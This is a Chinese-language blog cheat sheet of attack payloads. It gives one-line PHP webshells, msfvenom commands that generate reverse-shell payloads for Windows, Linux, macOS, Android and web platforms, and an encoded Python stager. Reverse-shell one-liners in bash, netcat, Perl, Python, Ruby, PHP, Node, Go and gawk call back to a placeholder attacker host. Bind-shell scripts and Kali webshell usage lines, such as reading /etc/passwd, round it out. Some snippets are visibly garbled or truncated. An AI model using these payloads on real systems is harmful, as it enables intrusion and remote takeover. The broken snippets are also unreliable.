一句话木马

PHP

# 运行PHP命令
# 文件名:shell.php
# 利用方式:http://example.com/shell.php?cmd=phpinfo();
<?php eval($_REQUEST[\'cmd\']);?> 

# 运行系统命令
# 文件名:shell2.php
# 利用方式:http://example.com/shell2.php?lalala=whoami
<?php system($_REQUEST[\'lalala\']);?> 

反弹Shell生成

Windows

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b \'\x00\x0a\xff\' -i 3 -f exe -o payload.exe

Mac OS

msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f macho -o payload.macho

Android

//需要签名
msfvenom -a x86 --platform Android -p android/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f apk -o payload.apk

Powershell

msfvenom -a x86 --platform Windows -p windows/powershell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e cmd/powershell_base64 -i 3 -f raw -o payload.ps1

Linux

msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f elf -o payload.elf

PHP

msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php

cat shell.php | pbcopy && echo \'<?php \' | tr -d \'\n\' > shell.php && pbpaste >> shell.php

ASPX

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f aspx -o payload.aspx

JSP

msfvenom --platform java -p java/jsp_shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.jsp

WAR

msfvenom -p java/jsp_shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw - o payload.war

NodeJS

msfvenom -p nodejs/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.js

Python

msfvenom -p python/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.py

生成编码后的文件:

import base64;exec(base64.b64decode(\'aW1wb3J0IHNvY2tldCxzdHJ1Y3QKcz1zb2NrZXQuc29ja2V0KDIsMSkKcy5jb25uZWN0KCgnMC4wLjAuMCcsMjMzMykpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YoNDA5NikKd2hpbGUgbGVuKGQpIT1sOgoJZCs9cy5yZWN2KDQwOTYpCmV4ZWMoZCx7J3MnOnN9KQo=\'))

Base64解码后:

import socket,struct
s=socket.socket(2,1)
s.connect((\'x.x.x.x\',2333))
l=struct.unpack(\'&gt;I\',s.recv(4))[0]
d=s.recv(4096)
while len(d)!=l:
d+=s.recv(4096)
exec(d,{\'s\':s})

Perl

msfvenom -p cmd/unix/reverse_perl LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.pl

Ruby

msfvenom -p ruby/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.rb

Lua

msfvenom -p cmd/unix/reverse_lua LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.lua

Windows Shellcode

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f c

Linux Shellcode

msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f c

Mac Shellcode

msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f c

自动化Payload生成工具

https://github.com/Screetsec/TheFatRat

常用反弹Shell

Bash Reverse Shell

exec /bin/bash 0&0 2>&0
0<&196;exec 196<>/dev/tcp/ATTACKING-IP/80; sh <&196 >&196 2>&196
exec 5<>/dev/tcp/ATTACKING-IP/80
cat <&5 | while read line; do $line 2>&5 >&5; done  

# or:

while read line 0<&5; do $line 2>&5 >&5; done
bash -i >& /dev/tcp/ATTACKING-IP/80 0>&1

socat Reverse Shell

socat tcp:ip:port exec:\'bash -i\' ,pty,stderr,setsid,sigint,sane &

Golang Reverse Shell

echo \'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","127.0.0.1:1337");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;http://cmd.Run();}\'>/tmp/sh.go&&go run /tmp/sh.go

PHP Reverse Shell

php -r \'$sock=fsockopen("ATTACKING-IP",80);exec("/bin/sh -i <&3 >&3 2>&3");\'
# (Assumes TCP uses file descriptor 3. If it doesn\'t work, try 4,5, or 6)
<?php exec("/bin/bash -c \'bash -i >& /dev/tcp/"ATTACKING IP"/443 0>&1\'");?>
<?=$x=explode(\'~\',base64_decode(substr(getallheaders()[\'x\'],1)));@$x[0]($x[1]);
<? php error_reporting(0); $ip = \'x.x.x.x\'; $port = 53; if (($f = \'stream_socket_client\') && is_callable($f)) { {$port}"); $s_type = \'stream\'; } if (!$s && ($f = \'fsockopen\') && is_callable($f)) { $s = $f($ip, $port); $s_ strlen($b)); break; case \'socket\': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS[\'msgsock\'] = $s; $GLOBALS[\'msgsock_type\'] = $s_type; if (extension_loaded(\'s >
<?php
$sock=fsockopen("xx.xx.xx.xx",xx);exec("/bin/sh -i <&3 >&3 2>&3");
?>

Netcat Reverse Shell

nc -e /bin/sh ATTACKING-IP 80
/bin/sh | nc ATTACKING-IP 80
rm -f /tmp/p; mknod /tmp/p p && nc ATTACKING-IP 4444 0/tmp/p

Another which works well for OpenBSD netcat rather than GNU nc:

mkfifo /tmp/lol;nc ATTACKER-IP PORT 0</tmp/lol | /bin/sh -i 2>&1 | tee /tmp/lol

Node.js Reverse Shell

require(\'child_process\').exec(\'bash -i >& /dev/tcp/10.0.0.1/80 0>&1\');

Telnet Reverse Shell

rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 80 0/tmp/p
telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443

Perl Reverse Shell

perl -e \'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\'

Perl Windows Reverse Shell

perl -MIO -e \'$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;\'
perl -e \'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\'

Ruby Reverse Shell

ruby -rsocket -e\'f=TCPSocket.open("ATTACKING-IP",80).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)\'

Java Reverse Shell

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Python Reverse Shell

python -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);\'
import socket,struct,time
for x in range(10):
    try:
        s=socket.socket(2,socket.SOCK_STREAM)
        s.connect((\'x.x.x.x\',xx))
        break
    except:
        time.sleep(5) l=struct.unpack(\'>I\',s.recv(4))[0]
d=s.recv(l)
while len(d)<l:
    d+=s.recv(l-len(d))
exec(d,{\'s\':s})
python -c "exec(\"import socket, subprocess;s = socket.socket();s.connect((\'x.x.x.x\',2333))\nwhile 1: proc = subprocess.Popen(s.recv(1024), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE);s.send(proc.stdout.read()+proc.stderr.read())\")"

Bind Shell

关于交互式正向连接shell,几点需要注意的地方:

  1. 不管在linux还是windows下,想要做到交互式,只能开启一个Shell。不能够每次接收到命令就再开启一个新的shell进程,然后执行。

  2. Windows下cmd.exe /K参数是保持cmd不结束,/c参数是执行完后就结束,注意区别。

Windows版本

from socket import *
import subprocess
import os, threading
def send(talk, proc):
import time
while True:
msg = proc.stdout.readline()
talk.send(msg)
if __name__ == "__main__":
server=socket(AF_INET,SOCK_STREAM)
server.bind((\'0.0.0.0\',23333))
server.listen(5)
print \'waiting for connect\'
talk, addr = server.accept()
print \'connect from\',addr
proc = subprocess.Popen(\'cmd.exe /K\', stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
t = threading.Thread(target = send, args = (talk, proc))
t.setDaemon(True)
t.start()
while True:
cmd=talk.recv(1024)
proc.stdin.write(cmd)
proc.stdin.flush()
server.close()

Linux版本

from socket import *
mport subprocess
mport os, threading, sys, time
f __name__ == "__main__":
erver=socket(AF_INET,SOCK_STREAM)
erver.bind((\'0.0.0.0\',11))
erver.listen(5)
rint \'waiting for connect\'
alk, addr = server.accept()
rint \'connect from\',addr
roc = subprocess.Popen(["/bin/sh","-i"],stdin=talk,stdout=talk, stderr=talk, shell=True)

执行后主动连接即可

Gawk Reverse Shell

gawk \'BEGIN {P=4444;S="> ";H="192.168.1.100";V="/inet/tcp/0/"H"/"P;while(1){do{printf S|&V;V|&getline c;if(c){while((c|&getline)>0)print $0|&V;close(c)}}while(c!="exit")close(V)}}\'
#!/usr/bin/gawk -f

BEGIN {
  Port    =       8080
  Prompt  =       "bkd> "

  Service = "/inet/tcp/" Port "/0/0"
  while (1) {
    do {
      printf Prompt |& Service
      Service |& getline cmd
      if (cmd) {
        while ((cmd |& getline) > 0)
          print $0 |& Service
        close(cmd)
      }
    } while (cmd != "exit")
    close(Service)
  }
}

Kali Web Shells

以下脚本保存在Kali Linux的/usr/share/webshell中,只有在可以上传注入传输到目标机的情况下才可以使用。

Kali PHP Web Shells

php-reverse-shell.php

Pen Test Monkey – PHP Reverse Shell

php-findsock-shell.php & findsock.c

Pen Test Monkey, Findsock Shell. Build gcc -o findsock findsock.c (be mindfull of the target servers architecture), execute with netcat not a browser nc -v target 80

simple-backdoor.php

PHP backdoor, usefull for CMD execution if upload / code injection is possible, usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd

php-backdoor.php

Larger PHP shell, with a text input box for command execution.

Kali Perl Reverse Shell

perl-reverse-shell.pl

Pen Test Monkey – Perl Reverse Shell

perlcmd.cgi

Pen Test Monkey, Perl Shell. Usage: http://target.com/perlcmd.cgi?cat /etc/passwd

Kali Cold Fusion Shell

cfexec.cfm

Cold Fusion Shell – aka CFM Shell

Kali ASP Shell

Classic ASP Reverse Shell + CMD shells: /usr/share/webshells/asp/

Kali ASPX Shells

ASP.NET reverse shells within Kali: /usr/share/webshells/aspx/

Kali JSP Reverse Shell

Kali JSP Reverse Shell: /usr/share/webshells/jsp/jsp-reverse.jsp

版权声明:本文为wudiaries原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://www.cnblogs.com/wudiaries/p/webshell.html